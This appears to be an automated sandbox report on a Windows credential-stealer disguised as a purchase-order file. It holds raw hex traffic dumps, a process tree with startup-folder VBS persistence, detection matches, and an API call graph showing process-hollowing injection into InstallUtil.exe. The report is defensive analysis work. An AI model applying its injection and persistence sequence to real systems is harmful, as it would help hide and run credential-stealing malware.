                                                                2025-01-09 18:08:01 UTC8000INData Raw: bd b0 8e c4 d2 2b 47 bf b5 9b 5d 86 f3 63 6e d8 44 2d e1 64 6e cf 11 57 b5 3a de 6e 96 4b 0d fc 83 dd ef 37 a6 d7 21 10 a2 95 35 94 b1 7a 06 28 8a 8a d9 11 41 a7 2e b1 90 98 52 a8 c5 76 8d 89 9b 0e 13 9e 0f 22 f5 be d1 f3 2a 6f 41 1a 28 9d 77 3d aa cc f4 f3 2e e4 fe e7 bb 49 be 64 34 25 dd 6b 31 8b 93 16 b1 04 c7 c7 5a ba 3f b8 bd b4 33 0c e1 5b 17 95 4e b8 26 86 8a 04 e1 5e 2b fa 3a ab fb d6 be 92 0c d7 12 1f 82 52 30 5f fe 0b 06 ba 11 84 dc 00 8e 23 bc 40 b8 51 fa 2d 51 66 9e 7c e5 69 f5 dc 2f 27 f1 0a d1 3a 89 2d 5e b4 8e 2d 20 a1 34 2f f8 a2 8b a5 1e e6 9f 7a d4 1e f1 2e c9 b1 d4 8d 6c 49 aa 61 95 23 86 5d 76 90 f4 57 1b f4 a5 69 5c 4f 94 7f 41 c8 80 43 8a e1 80 05 9d 9b 6b bb cd d9 00 d4 bb b7 1c 50 bc 98 44 a8 0e e4 31 9e 53 56 33 3b 22 99 e9 ac 8c
                                                                Data Ascii: +G]cnD-dnW:nK7!5z(A.Rv"*oA(w=.Id4%k1Z?3[N&^+:R0_#@Q-Qf|i/':-^- 4/z.lIa#]vWi\OACkPD1SV3;"
                                                                2025-01-09 18:08:01 UTC8000INData Raw: 18 5f 26 38 49 d3 8b 55 7a a8 63 80 c7 a2 a8 27 3b df 2a f2 34 17 65 52 b6 c3 26 44 af 3e 62 97 cf e3 9c 52 14 26 d9 94 f5 aa d1 e3 e7 90 9d 4a 4f a5 aa b9 3b 28 e7 c5 c8 78 be 58 10 07 29 00 6e 8f 5a 5e 70 fd ec a0 94 43 82 02 b8 81 1e bd a7 ea 51 67 d7 5e 88 8f bc a8 c3 01 2b 24 e6 77 86 27 b1 90 49 a2 4b 9d fa c8 b3 40 23 c0 7d fa b7 1b c6 67 01 67 fb 0b 83 6a cd e9 bb 37 a9 23 df 66 42 3b 93 f5 28 d8 45 62 fe 52 85 a3 d3 db 37 d6 21 d6 5b 6a 7f c5 62 39 fc 92 9c a1 92 e2 4f fa 08 4e ab e6 9b 29 ca 3b b5 d6 af 1e 01 6f 56 7d a7 a6 e6 7a 9a 7c 46 e4 53 87 96 bf ea 6e 31 1c 95 c3 ec 5c 43 e0 8e 3c 50 ee 5a c0 38 21 c7 7f 0a 21 3c f9 f7 8a 74 86 24 b5 7a b2 e3 e1 0c e2 85 d1 5d 48 35 4e e1 4d 3b 2b bc 11 74 3a 16 ff 16 43 87 66 18 47 01 59 b3 50 94 f5 39
                                                                Data Ascii: _&8IUzc';*4eR&D>bR&JO;(xX)nZ^pCQg^+$w'IK@#}ggj7#fB;(EbR7![jb9ON);oV}z|FSn1\C<PZ8!!<t$z]H5NM;+t:CfGYP9
                                                                2025-01-09 18:08:01 UTC8000INData Raw: 44 28 d8 9f ab ef c5 71 cc 06 e3 6c 19 d5 ea eb 36 7b e3 73 8c 64 8a 12 35 34 fb 20 3e 93 4c 51 73 83 e0 57 58 af 57 94 97 30 73 b2 24 02 93 06 ee 29 5a ce 7b a4 7e d5 41 fc 7e 46 98 69 6d 44 8c 87 c0 ef 99 54 57 0c 8f a3 c6 de 96 b4 d9 be 2e 70 f4 b2 5e 31 92 af ce 51 ca 56 1b 58 bc 6f 05 63 ee 7e 6c 86 d8 7d ff b5 a9 59 5e 5a ef ac 6e 3f ab 88 95 ed e5 7f f0 39 64 83 fc d4 a8 c1 43 8e 4d c9 b2 01 59 96 fd ad 84 ad 9f 09 98 17 e6 6b 01 f3 1d 7e b8 d9 90 60 28 58 c2 f1 d0 49 da 69 b7 0f 74 8c 80 e9 d7 a5 97 8d 73 ff 22 f3 40 e6 59 ff 43 87 f4 98 68 6b f1 72 07 b2 40 3e 55 3c c9 c4 54 87 30 c5 c6 16 be 13 c9 0e f5 bf dd 68 f9 3a d0 5f 8b ea 1c c8 b5 a3 32 b2 34 82 6a 8e c4 d7 4b ce 3f fb 1a e5 dc d5 34 cd 20 cf e6 bb e4 96 3d ff 51 67 61 29 47 ed b0 79 40
                                                                Data Ascii: D(ql6{sd54 >LQsWXW0s$)Z{~A~FimDTW.p^1QVXoc~l}Y^Zn?9dCMYk~`(XIits"@YChkr@>U<T0h:_24jK?4 =Qga)Gy@
                                                                2025-01-09 18:08:01 UTC8000INData Raw: 72 0c fb b9 d0 de fe 67 3d 5d c1 1e 31 bb 59 c8 74 26 3d 54 6f 6c df 06 1e 01 19 a3 4f f0 19 68 39 3d 19 18 df 9a 0f dd 05 7b c9 a9 b4 0f 9c 10 6d 14 1d 95 2f c0 1e 17 ef 20 5e d7 87 0f df 78 ed 5b 47 2c ad f4 31 97 87 f0 c3 b3 21 e4 da 51 bd 97 25 e4 d5 85 6f f0 3e e6 73 33 62 27 b4 cf 70 71 78 79 bd 87 0e 10 f5 88 61 c1 ce 9b 68 ab 4a a3 c0 ed 2f 4b 76 54 17 49 8f af 46 f2 17 af 51 c2 33 c7 5d e4 54 e5 0d 05 2d e7 9f 57 87 7d 29 a8 3d 57 87 ac 00 6a bd bc 3f d8 71 b0 93 77 bf 65 82 32 63 70 06 3a 3d e7 95 2e 40 a7 2d 42 a0 34 9c c9 5a 98 3d be 19 26 5d a4 e9 38 ee 06 d8 bc bd 91 f4 e3 ad 48 ff f2 03 2c 51 9a ad 67 c0 e0 74 b1 33 a5 38 16 4a e4 54 e3 97 fc 51 8e e7 be e3 10 18 bf 65 68 17 66 46 f2 f6 0e 63 ea 20 4f d1 4c 73 a3 39 6f 22 90 7c 81 6d e1 c1
                                                                Data Ascii: rg=]1Yt&=TolOh9={m/ ^x[G,1!Q%o>s3b'pqxyahJ/KvTIFQ3]T-W})=Wj?qwe2cp:=.@-B4Z=&]8H,Qgt38JTQehfFc OLs9o"|m
                                                                2025-01-09 18:08:01 UTC8000INData Raw: 31 34 73 09 6e 1d 20 25 f6 de 83 20 f0 72 d1 a0 79 f5 98 53 70 bf b0 a0 1d f7 3c 8f 1d 3d 9a 79 49 6c f1 d8 e9 50 65 70 e9 9c bd a4 2f 51 8c 79 75 60 22 18 bb 9e f3 c2 84 18 66 e8 ae 8a eb b6 1a b0 75 11 70 e0 a2 82 0f ce 14 3e 35 39 81 24 c0 10 1a 3c 5d 79 25 b4 a2 f1 a0 70 0b c4 52 de f8 f8 ae d5 99 0d 83 17 ff 63 22 e1 88 9d 63 ae 79 1d 2e 3e 9a 20 35 98 c5 45 b9 81 02 f7 76 a3 5e 90 03 60 44 ab a4 21 48 56 0a bd c1 f0 ce 99 70 de 3d 2c 57 b8 04 67 61 1e e6 65 1a f7 3d 91 95 7d 26 ef ad 59 e4 7d 84 ce 5d 50 9b f0 28 c2 dd 15 e1 97 67 52 00 c5 d5 44 61 9c 00 fe 91 63 d9 a9 2d a8 f4 d3 e3 c7 06 76 a9 a7 22 4e e2 9b bf 7b a7 49 b3 2a 17 ab 85 75 b7 42 d0 96 c2 db 71 d2 cb 42 5a 20 dc a9 d7 bc 12 83 a1 78 5f 3e bf 1b f1 5b da 0f 7b 0f c0 92 7d ec be 6d d7
                                                                Data Ascii: 14sn % rySp<=yIlPep/Qyu`"fup>59$<]y%pRc"cy.> 5Ev^`D!HVp=,Wgae=}&Y}]P(gRDac-v"N{I*uBqBZ x_>[{}m
                                                                2025-01-09 18:08:01 UTC8000INData Raw: e4 1d 1b 40 80 1b 40 3e 1e 3b 58 03 6b fd b4 2c 46 e8 1c e4 4f af 85 16 3b c4 05 a2 9f 7a 43 14 0b 9d 3a ec b3 31 9a 73 7b 89 20 8c 80 66 67 44 6a 79 75 ec 18 df d7 f8 b1 bc 71 a3 1b 8c f1 71 5a c0 f8 bc 0c ab 97 4d 86 e3 d0 d4 5c 3f 17 1a 76 f4 e6 05 bc 58 10 6a 7d 32 d0 dc 62 8b 07 ec 7e f8 1e a6 fb 67 4b a8 c5 1e ef ac b7 62 cf f1 8f 2f 40 d9 7a 22 b1 24 ed 17 63 bf 97 5a 49 3f 8a 8e 74 a6 5a c7 03 9b 6f 29 47 14 6b 18 de f1 b2 e1 84 55 94 de 62 fa 74 4f 02 5c 00 4e 81 b3 38 0e c4 f9 17 c6 b9 25 ac ec 8b a5 41 ec 79 39 fb a8 e1 ae 5c 47 46 9e bd d4 5b 1a 05 1b d3 31 a5 c4 3c dc 46 56 72 d6 b3 91 17 e0 0e 21 42 d6 ea b4 21 d5 5f 5d 2e a5 a4 b3 84 f0 6b e7 7c 8b b0 13 79 0c bc c2 95 e7 9e d1 cc 20 d3 ee 7e cf 79 b0 50 96 9b 68 90 f8 e0 cb ab 3b 64 7b 30
                                                                Data Ascii: @@>;Xk,FO;zC:1s{ fgDjyuqqZM\?vXj}2b~gKb/@z"$cZI?tZo)GkUbtO\N8%Ay9\GF[1<FVr!B!_].k|y ~yPh;d{0
                                                                2025-01-09 18:08:01 UTC8000INData Raw: 03 c0 d7 67 18 d9 87 53 4b 34 dc 3d a7 21 35 2c 34 ff d0 c2 b5 76 d3 d6 19 41 2f bf 3a a2 48 82 7f 7a 8b e6 c7 74 9a f5 31 4d c6 97 e1 49 0a 74 c9 7b cc 4b 4d f0 8a be f2 37 25 74 26 b3 99 f6 57 8d db 42 36 de 51 a8 59 4c a1 5a b4 a2 cf 3a 4d 1a 03 ef 7d 67 97 6a c1 dd 1c e9 b3 b0 27 92 b8 28 21 89 1a e8 2c 8e b2 72 35 55 09 2d 86 2e f8 65 54 db 8e 5e b7 e2 7c 38 36 68 2d a1 6a 65 dc 69 d9 89 cf 81 eb 8d 96 f3 3d cf 3e bd 1e 14 5c 2d e4 5c 9b 80 7d 3f 05 da 52 2e 52 fb f1 df e1 7f d0 31 ef b1 6b 0b ca 71 67 56 6f 9a 86 e5 aa b9 4e 51 f2 08 45 10 d5 ee 7e 28 3a 30 ce 8b da 21 fe 07 68 fd 11 3c 15 41 f2 92 b7 66 87 b1 c4 91 d6 9e f2 54 ed aa d4 26 f6 53 ea a9 ce 59 1a 36 ba e7 9e b9 a1 3b b5 ff 83 cd 31 e5 4e 30 b9 6a 51 c0 5d 47 b6 81 a6 41 03 c4 ef 23 58
                                                                Data Ascii: gSK4=!5,4vA/:Hzt1MIt{KM7%t&WB6QYLZ:M}gj'(!,r5U-.eT^|86h-jei=>\-\}?R.R1kqgVoNQE~(:0!h<AfT&SY6;1N0jQ]GA#X


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:13:07:37
                                                                Start date:09/01/2025
                                                                Path:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe"
                                                                Imagebase:0x4c0000
                                                                File size:27'136 bytes
                                                                MD5 hash:95BEC6594E293A42F4ABB049EA7E81DB
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.69484926490.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.69506645006.0000000006590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.69496394260.0000000003928000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:13:07:50
                                                                Start date:09/01/2025
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                Imagebase:0xac0000
                                                                File size:42'064 bytes
                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:3
                                                                Start time:13:07:59
                                                                Start date:09/01/2025
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs"
                                                                Imagebase:0x7ff6bcdf0000
                                                                File size:170'496 bytes
                                                                MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:13:07:59
                                                                Start date:09/01/2025
                                                                Path:C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"
                                                                Imagebase:0xab0000
                                                                File size:27'136 bytes
                                                                MD5 hash:95BEC6594E293A42F4ABB049EA7E81DB
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.69719834098.0000000004883000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 68%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:13:08:11
                                                                Start date:09/01/2025
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                Imagebase:0x1c0000
                                                                File size:42'064 bytes
                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:10.8%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:4.1%
                                                                  Total number of Nodes:220
                                                                  Total number of Limit Nodes:6
                                                                  execution_graph 59369 66a1c88 59370 66a1cd6 NtProtectVirtualMemory 59369->59370 59372 66a1d20 59370->59372 59346 5832088 59347 583209d 59346->59347 59350 58320b3 59347->59350 59351 5833f8b 59347->59351 59356 5834413 59347->59356 59352 5833f91 59351->59352 59361 58375c0 59352->59361 59365 58375b5 59352->59365 59353 5833225 59353->59350 59357 5833225 59356->59357 59358 5833f93 59356->59358 59357->59350 59359 58375c0 CopyFileA 59358->59359 59360 58375b5 CopyFileA 59358->59360 59359->59357 59360->59357 59362 5837615 CopyFileA 59361->59362 59364 5837717 59362->59364 59366 58375bc CopyFileA 59365->59366 59368 5837717 59366->59368 59373 5838568 59374 583856a 59373->59374 59375 5838593 59374->59375 59377 58388b4 59374->59377 59378 58388be 59377->59378 59382 5839f21 59378->59382 59387 5839f30 59378->59387 59383 5839f24 59382->59383 59392 583a497 59383->59392 59397 583a287 59383->59397 59388 5839f36 59387->59388 59390 583a497 10 API calls 59388->59390 59391 583a287 10 API calls 59388->59391 59389 5838605 59389->59375 59390->59389 59391->59389 59393 583a4ab 59392->59393 59402 583a841 59393->59402 59416 583a850 59393->59416 59394 583a4de 59398 583a291 59397->59398 59400 583a841 10 API calls 59398->59400 59401 583a850 10 API calls 59398->59401 59399 583a4de 59400->59399 59401->59399 59403 583a844 59402->59403 59409 583a887 59403->59409 59430 583b186 59403->59430 59435 583b061 59403->59435 59440 583aeb2 59403->59440 59445 583af13 59403->59445 59450 583b9e3 59403->59450 59456 583b3ac 59403->59456 59461 583ae4d 59403->59461 59466 583ba9a 59403->59466 59471 583bcda 59403->59471 59476 583b24b 59403->59476 59481 583b854 59403->59481 59409->59394 59417 583a865 59416->59417 59418 583a887 59417->59418 59419 583b9e3 4 API calls 59417->59419 59420 583af13 2 API calls 59417->59420 59421 583aeb2 2 API calls 59417->59421 59422 583b061 2 API calls 59417->59422 59423 583b186 2 API calls 59417->59423 59424 583b854 2 API calls 59417->59424 59425 583b24b 2 API calls 59417->59425 59426 583bcda 2 API calls 59417->59426 59427 583ba9a 2 API calls 59417->59427 59428 583ae4d 2 API calls 59417->59428 59429 583b3ac 2 API calls 59417->59429 59418->59394 59419->59418 59420->59418 59421->59418 59422->59418 59423->59418 59424->59418 59425->59418 59426->59418 59427->59418 59428->59418 59429->59418 59431 583bd93 59430->59431 59486 66a44e8 59431->59486 59490 66a44f0 59431->59490 59432 583ad23 59436 583b06b 59435->59436 59494 66a4b38 59436->59494 59498 66a4b30 59436->59498 59437 583ad23 59441 583aec1 59440->59441 59502 66a3ee8 59441->59502 59506 66a3ee0 59441->59506 59442 583aeed 59446 583bd6d 59445->59446 59447 583ad23 59445->59447 59448 66a44e8 VirtualAllocEx 59446->59448 59449 66a44f0 VirtualAllocEx 59446->59449 59448->59447 59449->59447 59451 583b9fb 59450->59451 59510 583c4e3 59451->59510 59518 583c538 59451->59518 59525 583c52b 59451->59525 59452 583ba13 59457 583b3bb 59456->59457 59459 66a37d8 WriteProcessMemory 59457->59459 59460 66a37d0 WriteProcessMemory 59457->59460 59458 583ad23 59458->59409 59459->59458 59460->59458 59462 583ae5c 59461->59462 59464 66a3ee8 Wow64SetThreadContext 59462->59464 59465 66a3ee0 Wow64SetThreadContext 59462->59465 59463 583ad23 59464->59463 59465->59463 59467 583baa9 59466->59467 59469 66a37d8 WriteProcessMemory 59467->59469 59470 66a37d0 WriteProcessMemory 59467->59470 59468 583ad23 59469->59468 59470->59468 59472 583ad23 59471->59472 59473 583b061 59471->59473 59474 66a4b38 NtResumeThread 59473->59474 59475 66a4b30 NtResumeThread 59473->59475 59474->59472 59475->59472 59477 583b251 59476->59477 59479 66a37d8 WriteProcessMemory 59477->59479 59480 66a37d0 WriteProcessMemory 59477->59480 59478 583b300 59478->59409 59479->59478 59480->59478 59482 583b85e 59481->59482 59484 66a44e8 VirtualAllocEx 59482->59484 59485 66a44f0 VirtualAllocEx 59482->59485 59483 583ad23 59484->59483 59485->59483 59487 66a44ec VirtualAllocEx 59486->59487 59489 66a456d 59487->59489 59489->59432 59491 66a4530 VirtualAllocEx 59490->59491 59493 66a456d 59491->59493 59493->59432 59495 66a4b80 NtResumeThread 59494->59495 59497 66a4bb5 59495->59497 59497->59437 59499 66a4b80 NtResumeThread 59498->59499 59501 66a4bb5 59499->59501 59501->59437 59503 66a3f2d Wow64SetThreadContext 59502->59503 59505 66a3f75 59503->59505 59505->59442 59507 66a3ee4 Wow64SetThreadContext 59506->59507 59509 66a3f75 59507->59509 59509->59442 59511 583c561 59510->59511 59513 583c4ea 59510->59513 59512 583c571 59511->59512 59533 583cf11 59511->59533 59538 583cafe 59511->59538 59543 583c71f 59511->59543 59548 583c798 59511->59548 59512->59452 59513->59452 59519 583c54f 59518->59519 59520 583c571 59519->59520 59521 583cf11 2 API calls 59519->59521 59522 583c798 2 API calls 59519->59522 59523 583c71f 2 API calls 59519->59523 59524 583cafe 2 API calls 59519->59524 59520->59452 59521->59520 59522->59520 59523->59520 59524->59520 59526 583c533 59525->59526 59527 583c5a5 59525->59527 59528 583c571 59526->59528 59529 583cf11 2 API calls 59526->59529 59530 583c798 2 API calls 59526->59530 59531 583c71f 2 API calls 59526->59531 59532 583cafe 2 API calls 59526->59532 59528->59452 59529->59528 59530->59528 59531->59528 59532->59528 59534 583c5fc 59533->59534 59535 583cb24 59533->59535 59535->59533 59553 66a2ac8 59535->59553 59557 66a2ac3 59535->59557 59539 583cb08 59538->59539 59540 583c5fc 59539->59540 59541 66a2ac8 2 API calls 59539->59541 59542 66a2ac3 2 API calls 59539->59542 59541->59539 59542->59539 59544 583c72e 59543->59544 59574 66a26e8 59544->59574 59578 66a26dc 59544->59578 59549 583c7c0 59548->59549 59551 66a26e8 CreateProcessA 59549->59551 59552 66a26dc CreateProcessA 59549->59552 59550 583cbf2 59551->59550 59552->59550 59554 66a2add 59553->59554 59561 66a3197 59554->59561 59558 66a2add 59557->59558 59560 66a3197 2 API calls 59558->59560 59559 66a2af3 59559->59535 59560->59559 59562 66a31a6 59561->59562 59566 66a37d8 59562->59566 59570 66a37d0 59562->59570 59563 66a2af3 59563->59535 59567 66a3820 WriteProcessMemory 59566->59567 59569 66a3877 59567->59569 59569->59563 59571 66a37d4 WriteProcessMemory 59570->59571 59573 66a3877 59571->59573 59573->59563 59575 66a274c CreateProcessA 59574->59575 59577 66a28d4 59575->59577 59579 66a26e0 CreateProcessA 59578->59579 59581 66a28d4 59579->59581 59582 66bc990 59583 66bc9a5 59582->59583 59586 66bcb11 59583->59586 59587 66bcb30 59586->59587 59588 66bc9bb 59587->59588 59589 66bd788 VirtualProtect 59587->59589 59590 66bd780 VirtualProtect 59587->59590 59589->59587 59590->59587 59591 e523d8 59592 e523f2 59591->59592 59593 e52402 59592->59593 59597 e53894 59592->59597 59600 e5a569 59592->59600 59605 e54f16 59592->59605 59609 e5fdb8 59597->59609 59601 e5b715 59600->59601 59622 6481198 59601->59622 59626 6481189 59601->59626 59602 e53010 59606 e54f35 59605->59606 59608 e5fdb8 2 API calls 59606->59608 59607 e53010 59608->59607 59611 e5fddf 59609->59611 59610 e538b2 59610->59593 59614 6480308 59611->59614 59618 6480301 59611->59618 59615 6480350 VirtualProtect 59614->59615 59617 648038b 59615->59617 59617->59610 59619 6480350 VirtualProtect 59618->59619 59621 648038b 59619->59621 59621->59610 59623 64811ad 59622->59623 59631 64811d9 59623->59631 59627 6481144 59626->59627 59628 6481196 59626->59628 59627->59602 59630 64811d9 2 API calls 59628->59630 59629 64811c5 59629->59602 59630->59629 59633 648120f 59631->59633 59632 64811c5 59632->59602 59636 64812e8 59633->59636 59640 64812f0 59633->59640 59637 6481330 VirtualAlloc 59636->59637 59639 648136a 59637->59639 59639->59632 59641 6481330 VirtualAlloc 59640->59641 59643 648136a 59641->59643 59643->59632

                                                                  Executed Functions

                                                                  Function 06487038 Relevance: 2.6, Strings: 1, Instructions: 1350COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 54 6487038-648703c 55 6486fc8-6486fd4 54->55 56 648703e-6487076 54->56 55->54 57 6487078 56->57 58 648707d-648719f 56->58 57->58 62 64871a1-64871ad 58->62 63 64871c3-64871cf 58->63 68 64871b7 62->68 64 64871d1 63->64 65 64871d6-64871db 63->65 64->65 66 64871dd-64871e9 65->66 67 6487213-648725c 65->67 69 64871eb 66->69 70 64871f0-648720e 66->70 77 648725e 67->77 78 6487263-6487296 67->78 340 64871bd call 6489bd8 68->340 341 64871bd call 6489bc9 68->341 69->70 71 6488977-648897d 70->71 73 64889a8 71->73 74 648897f-648899f 71->74 74->73 77->78 81 64872a0-64872a6 78->81 82 64872b2-6487528 81->82 103 6487f58-6487f64 82->103 104 6487f6a-6487fa2 103->104 105 648752d-6487539 103->105 113 648807c-6488082 104->113 106 648753b 105->106 107 6487540-6487665 105->107 106->107 142 64876a5-648772e 107->142 143 6487667-648769f 107->143 115 6488088-64880c0 113->115 116 6487fa7-6488024 113->116 126 648841e-6488424 115->126 131 6488026-648802a 116->131 132 6488057-6488079 116->132 128 648842a-6488472 126->128 129 64880c5-64882c7 126->129 139 64884ed-6488538 128->139 140 6488474-64884e7 128->140 223 64882cd-6488361 129->223 224 6488366-648836a 129->224 131->132 134 648802c-6488054 131->134 132->113 134->132 162 6488941-6488947 139->162 140->139 168 648773d-64877c1 142->168 169 6487730-6487738 142->169 143->142 164 648853d-64885bf 162->164 165 648894d-6488975 162->165 183 64885c1-64885dc 164->183 184 64885e7-64885f3 164->184 165->71 196 64877d0-6487854 168->196 197 64877c3-64877cb 168->197 172 6487f49-6487f55 169->172 172->103 183->184 185 64885fa-6488606 184->185 186 64885f5 184->186 188 6488608-6488614 185->188 189 6488619-6488628 185->189 186->185 192 6488928-648893e 188->192 193 648862a 189->193 194 6488631-6488909 189->194 192->162 193->194 198 64887fe-6488866 193->198 199 6488790-64887f9 193->199 200 6488722-648878b 193->200 201 64886a5-648871d 193->201 202 6488637-64886a0 193->202 228 6488914-6488920 194->228 248 6487863-64878e7 196->248 249 6487856-648785e 196->249 197->172 234 64888da-64888e0 198->234 199->228 200->228 201->228 202->228 246 6488405-648841b 223->246 230 648836c-64883c5 224->230 231 64883c7-6488404 224->231 228->192 230->246 231->246 236 6488868-64888c6 234->236 237 64888e2-64888ec 234->237 253 64888c8 236->253 254 64888cd-64888d7 236->254 237->228 246->126 261 64878e9-64878f1 248->261 262 64878f6-648797a 248->262 249->172 253->254 254->234 261->172 268 6487989-6487a0d 262->268 269 648797c-6487984 262->269 275 6487a1c-6487aa0 268->275 276 6487a0f-6487a17 268->276 269->172 282 6487aaf-6487b33 275->282 283 6487aa2-6487aaa 275->283 276->172 289 6487b42-6487bc6 282->289 290 6487b35-6487b3d 282->290 283->172 296 6487bc8-6487bd0 289->296 297 6487bd5-6487c59 289->297 290->172 296->172 303 6487c68-6487cec 297->303 304 6487c5b-6487c63 297->304 310 6487cfb-6487d7f 303->310 311 6487cee-6487cf6 303->311 304->172 317 6487d8e-6487e12 310->317 318 6487d81-6487d89 310->318 311->172 324 6487e21-6487ea5 317->324 325 6487e14-6487e1c 317->325 318->172 331 6487eb4-6487f38 324->331 332 6487ea7-6487eaf 324->332 325->172 338 6487f3a-6487f42 331->338 339 6487f44-6487f46 331->339 332->172 338->172 339->172 340->63 341->63
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505733961.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6480000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2
                                                                  • API String ID: 0-450215437
                                                                  • Opcode ID: 0456ab5dc6f0592c7895e646618f597bf1d8efd0f65ff7fde9435ef548007c1d
                                                                  • Instruction ID: 8063239b16f29fbae71e108dfb87d0f449f7d123d86dd14d9cf7b8a5e35b726c
                                                                  • Opcode Fuzzy Hash: 0456ab5dc6f0592c7895e646618f597bf1d8efd0f65ff7fde9435ef548007c1d
                                                                  • Instruction Fuzzy Hash: E9E2D574A056188FCB64EF68D894B9EBBF2FB89701F1081EAD509A7355DB309E85CF40
                                                                  Function 064E3B0F Relevance: 2.4, Strings: 1, Instructions: 1147COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4
                                                                  • API String ID: 0-4088798008
                                                                  • Opcode ID: b3c6e9e488a85cf7c71fcc4472b9011697b76fa1f008b3d0eb029dbb84b50601
                                                                  • Instruction ID: 434aecc16a02c7d00c90f35d1e673d906e5a04bab9edb60d4c15cf5c5843395a
                                                                  • Opcode Fuzzy Hash: b3c6e9e488a85cf7c71fcc4472b9011697b76fa1f008b3d0eb029dbb84b50601
                                                                  • Instruction Fuzzy Hash: 8EB2F434A00218CFDB55DFA8C894BAEB7B6BF88701F15819AE505AB3A5DB70ED41CF50
                                                                  Function 0583E6A0 Relevance: 1.9, Strings: 1, Instructions: 615COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
